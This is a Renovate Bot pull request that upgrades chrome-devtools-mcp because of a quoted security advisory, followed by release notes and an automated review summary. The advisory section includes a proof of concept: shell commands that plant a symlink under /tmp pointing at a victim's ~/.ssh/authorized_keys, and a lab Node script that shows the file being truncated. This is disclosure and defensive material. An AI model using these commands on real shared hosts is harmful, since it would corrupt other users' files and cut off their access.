Update npm package chrome-devtools-mcp to v1 [SECURITY]

[hash-worker]

This PR contains the following updates:

Package	Change	Age	Confidence
chrome-devtools-mcp	^0.21.0 → ^1.0.0

GitHub Vulnerability Alerts

CVE-2026-53765

Summary

The chrome-devtools-mcp daemon writes its PID file with fs.writeFileSync() to a deterministic runtime path. On typical macOS environments, and on Linux sessions where $XDG_RUNTIME_DIR is unset, that runtime path falls back to /tmp/chrome-devtools-mcp-<uid>/daemon.pid.

Because the write does not use O_NOFOLLOW, a local low-privilege user on the same POSIX host can pre-create /tmp/chrome-devtools-mcp-<victim_uid>/daemon.pid as a symlink to a file writable by the victim. When the victim later starts daemon mode, fs.writeFileSync() follows the symlink and truncates the target file to the daemon PID string.

This report is deliberately scoped to POSIX systems where the daemon falls back to /tmp: typical macOS environments and Linux sessions without $XDG_RUNTIME_DIR. Windows is out of scope because the default temp directory is per-user and symlink creation has additional privilege requirements.

Details

Affected code:

src/daemon/daemon.ts:38-42

const pidFilePath = getPidFilePath(sessionId);
fs.mkdirSync(path.dirname(pidFilePath), {
  recursive: true,
});
fs.writeFileSync(pidFilePath, process.pid.toString());

src/daemon/utils.ts:49-68

export function getRuntimeHome(sessionId: string): string {
  const platform = os.platform();
  const uid = os.userInfo().uid;
  const suffix = sessionId ? `-${sessionId}` : '';
  const appName = APP_NAME + suffix;

  if (process.env.XDG_RUNTIME_DIR) {
    return path.join(process.env.XDG_RUNTIME_DIR, appName);
  }

  if (platform === 'darwin' || platform === 'linux') {
    return path.join('/tmp', `${appName}-${uid}`);
  }

  return path.join(os.tmpdir(), appName);
}

The /tmp sticky bit prevents non-owner file removal, but it does not prevent another local user from creating a subdirectory under /tmp. If an attacker creates /tmp/chrome-devtools-mcp-<victim_uid>/ first and places a symlink at daemon.pid, the victim's daemon process follows that link when writing the PID.

Preconditions:

• The victim is on a typical macOS environment where $XDG_RUNTIME_DIR is unset, or on a Linux system/session where $XDG_RUNTIME_DIR is unset.
• The attacker has any local user account on the same host.
• The victim later runs a chrome-devtools CLI path or MCP integration that starts daemon mode.

PoC

Realistic POSIX scenario:

# Attacker, before victim starts daemon mode.
victim_uid=1000
mkdir -p "/tmp/chrome-devtools-mcp-${victim_uid}"
chmod 0755 "/tmp/chrome-devtools-mcp-${victim_uid}"
ln -s "/home/victim/.ssh/authorized_keys" \
      "/tmp/chrome-devtools-mcp-${victim_uid}/daemon.pid"

# Victim later starts daemon mode.
chrome-devtools start

# Result:

# fs.writeFileSync follows the symlink, so authorized_keys is truncated to
# the daemon PID string.

Lab-only PoC that touches only a fresh os.tmpdir()/cdtmcp-lab-* directory:

const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

const lab = fs.mkdtempSync(path.join(os.tmpdir(), 'cdtmcp-lab-'));

try {
  fs.chmodSync(lab, 0o755);

  const victimSecret = path.join(lab, 'victim-secret.txt');
  fs.writeFileSync(
    victimSecret,
    'IMPORTANT VICTIM CONTENT - MUST NOT BE TRUNCATED\n',
  );

  const runtimeDir = path.join(lab, 'attacker-pre-created');
  fs.mkdirSync(runtimeDir, {recursive: true});

  const pidFilePath = path.join(runtimeDir, 'daemon.pid');
  fs.symlinkSync(victimSecret, pidFilePath);

  // Exact pattern from src/daemon/daemon.ts:39-42.
  fs.mkdirSync(path.dirname(pidFilePath), {recursive: true});
  fs.writeFileSync(pidFilePath, process.pid.toString());

  console.log(fs.readFileSync(victimSecret, 'utf8'));
  // -> "<pid>"  (victim file was truncated/overwritten)
} finally {
  fs.rmSync(lab, {recursive: true, force: true});
}

Observed output from the lab PoC:

[setup] victim secret BEFORE attack:
  IMPORTANT VICTIM CONTENT - MUST NOT BE TRUNCATED
[attack] symlink placed: <runtimeDir>/daemon.pid -> <victimSecret>
[victim ran daemon] victim secret AFTER:
  <pid>
[lstat pidFile] still symlink
[outcome] victim file was overwritten via attacker-placed symlink.

I can provide the standalone pidfile_symlink_poc.cjs file if needed. The attached/local version includes platform notes, Windows symlink-permission diagnostics, and cleanup guards.

Impact

Who can exploit:

Any local user account on the same POSIX host where the victim runs the chrome-devtools-mcp daemon, when $XDG_RUNTIME_DIR is unset for that user session.

Security impact:

• Integrity: an attacker can truncate and overwrite any file the victim can write, with content constrained to the daemon PID string.
• Availability: critical user configuration files can be corrupted until restored from backup.
• Confidentiality: none directly; the written content is only the PID string.

Example targets affected by truncation:

• ~/.ssh/authorized_keys, causing the victim to lose SSH access.
• ~/.bashrc, ~/.zshrc, or ~/.profile, breaking shell startup.
• Project .env, secrets.json, license files, or line-oriented config files.
• Logs or local audit files writable by the victim.

Suggested fix:

Open the PID file with O_NOFOLLOW and validate runtime directory ownership/permissions before writing:

import {constants, openSync, writeSync, closeSync} from 'node:fs';

const fd = openSync(
  pidFilePath,
  constants.O_WRONLY |
    constants.O_CREAT |
    constants.O_TRUNC |
    constants.O_NOFOLLOW,
  0o600,
);
writeSync(fd, process.pid.toString());
closeSync(fd);

---

Release Notes

ChromeDevTools/chrome-devtools-mcp (chrome-devtools-mcp)

v1.1.0

Compare Source

🎉 Features

• add extraHttpHeaders emulation to emulate tool (#​1176) (6992106)
• created cursor plugin.json setting file with release auto versioning (#​2091) (10c8205)

🛠️ Fixes

• Apply CPU throttling to secondary CDP session (#​2092) (3ade962)
• cli: address pid file creation issues (#​2124) (1b51a52)
• exit on stdin EOF and SIGTERM/SIGINT/SIGHUP, closing the browser cleanly (#​2117) (43b934c)
• Fix throttling info in performance trace output (#​2096) (57f32b0)
• make pageId required (#​2084) (d751693), closes #​2052
• remove duplicate .mcp.json (#​2095) (dbf6ba9)
• Set viewport after updating timeouts when setting emulation (#​2134) (0c3ac37)
• use pinned version for plugins (#​2135) (8ea5f09)
• use realpath for MCP roots validation (#​2127) (176eb69)

📄 Documentation

• align coding agent examples with Antigravity (#​2094) (ce31594)
• fix installation instructions for VS Code (#​2087) (9f47df3)

🏗️ Refactor

• remove redundant validatePath calls (#​2136) (521c388)

v1.0.1

Compare Source

🛠️ Fixes

• include saved image paths in CLI JSON output (#​2070) (a9fb555)

📄 Documentation

• add version to the LTS (#​2080) (a2083a2)

v0.26.0

Compare Source

🎉 Features

• add an error logging method (#​2006) (06e0ab6)

🛠️ Fixes

• cli: allow --autoConnect on CLI start (#​2015) (9882391), closes #​1859 #​1184
• Make fill_form more appealing when filling forms with checkboxes (#​1971) (407c2bd)
• only require a page in page-scoped tools (#​2030) (8e06761)
• telemetry: re-run the update metrics script (#​2005) (e9ec375)

📄 Documentation

• Fix Claude Code instructions (#​2018) (a5ad67b)

🏗️ Refactor

• extract ToolHandler (#​2032) (178b790)

v0.25.0

Compare Source

🎉 Features

• support third-party developer tools (#​1982) (7548c97)

🛠️ Fixes

• input: stop native select option clicks from timing out (#​1960) (510ec0f)
• make sure env variables are consistently applied when parsing args (#​1994) (f45f068)

📄 Documentation

• extract WebMCP into its own category (#​1993) (da0441d)
• remove token estimates (#​2003) (14938ac)
• update generate-docs.ts tools output order (#​1991) (895fc65), closes #​1932

v0.24.0

Compare Source

🎉 Features

• agentic browsing in lighthouse (#​1931) (5fa2750)
• cli: generate commands for conditional tools (#​1962) (b2b3e99)
• group identical consecutive console messages in list_console_messages (#​1939) (dbddb2e)
• support MCP client roots feature (#​1945) (def53dd)

🛠️ Fixes

• add proactive tool rejection when dialog is open (#​1978) (6ce254e)
• always allow tmpdir access with client roots (#​1984) (a90378a)
• cli: re-generate cli correctly (#​1969) (8cbdb8d)
• handle errors due to open dialogs during tool calls (#​1953) (06b331f)
• note about missing elements should not show in verbose mode (#​1950) (80bee1e)
• telemetry: bucketize string length (#​1972) (bf3cb58)

v0.23.0

Compare Source

🎉 Features

• add an option to customize ffmpeg path (#​1937) (b377454)
• support experimental allowlist for navigate tool calls (#​1935) (d502557)
• support webm format in screencast (#​1934) (85b8993)

📄 Documentation

• clarify resource limitations around the number of tabs (#​1927) (42be7c3)

🏗️ Refactor

• add support for CLI sessionIds in tests (#​1919) (82b67b0)

v0.22.0

Compare Source

🎉 Features

• add update notification to both binaries (#​1783) (e01e333)
• auto handle dialogs during script evaluation (#​1839) (da33cb5)
• ensure extensions for file outputs (#​1867) (e7a0d50)
• experimental click_at(x,y) tool (#​1788) (c4f5471)
• support Chrome extensions debugging (#​1922) (3ff21cf)
• support DevTools header redactions as an option (#​1848) (5c398c4)
• webmcp: Add experimental tool to execute WebMCP tool (#​1873) (0aff266)
• webmcp: Add experimental tool to list WebMCP tools page exposes (#​1845) (f97b573)

🛠️ Fixes

• avoid showing update notification for local builds (#​1889) (3f0cf10), closes #​1886
• cli: correct WebP MIME type check in handleResponse ('webp' → 'image/webp') (#​1899) (e3a5f6b), closes #​1898
• ignore unmapped PerformanceIssue events (#​1852) (ea57e86)
• network: trailing data in Network redirect chain (#​1880) (2f458c1)
• remove double space in navigate error message (#​1847) (429e0ca)

📄 Documentation

• clarify tools included into CLI (#​1925) (76ab9fa)
• document network response and request extensions (#​1887) (796d6f2)
• fix skill and reference documentation issues (#​1249) (9236834)
• Include Mistral Vibe setup in README (#​1801) (582c9e0)
• Rename project and enhance README content (#​1856) (c066488)
• update the README on installing as a VS code agent plugin (#​1796) (1b5dcae)

🏗️ Refactor

• move waitForEventsAfterAction to McpPage (#​1780) (c7c8f50)
• use puppeteer Extension API (#​1911) (ec895f1)

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • "before 4am every weekday,every weekend"

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[cursor]

PR Summary

Low Risk
Dev-only dependency bump with no application source changes; main risk is behavioral differences in the Chrome DevTools MCP/CLI tooling used locally or in agent workflows.

Overview
Bumps the devDependency chrome-devtools-mcp from ^0.21.0 to ^1.0.0 (lockfile resolves 1.3.0) in package.json and package-lock.json. This is a major-version upgrade driven by CVE-2026-53765, where older daemon PID file writes under /tmp could follow attacker-placed symlinks and truncate victim-writable files; v1 includes the upstream PID-file hardening fix.

The lockfile also reflects a dependency graph tweak: ws is no longer marked dev-only at the top level, consistent with chrome-devtools-mcp pulling it in as a transitive runtime dependency.

^{Reviewed by Cursor Bugbot for commit 762897e. Bugbot is set up for automated code reviews on this repo. Configure here.}